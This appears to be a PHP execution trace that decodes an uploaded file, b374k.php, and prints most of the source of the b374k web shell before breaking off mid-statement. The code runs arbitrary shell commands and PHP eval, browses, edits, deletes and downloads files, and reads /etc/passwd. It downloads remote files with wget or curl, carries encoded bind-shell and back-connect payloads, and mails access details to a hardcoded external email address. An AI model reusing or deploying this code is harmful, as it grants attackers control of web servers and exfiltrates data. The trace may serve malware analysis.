2 6 0 0.000502 410992 base64_decode 0 /var/www/html/uploads/b374k.php 194 1 '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2 6 1 0.000572 427408
2 6 R '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 0 0.000805 427376 gzinflate 0 /var/www/html/uploads/b374k.php 194 1 '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 1 0.001144 468368
2 7 R '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
2 8 0 0.002332 692672 eval 1 '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "username: ".$user."\\n";$mes .= "password: ".$pass."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$full\\">delete</a> | <a href=\\"?y=$pwd&dl=$full\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= 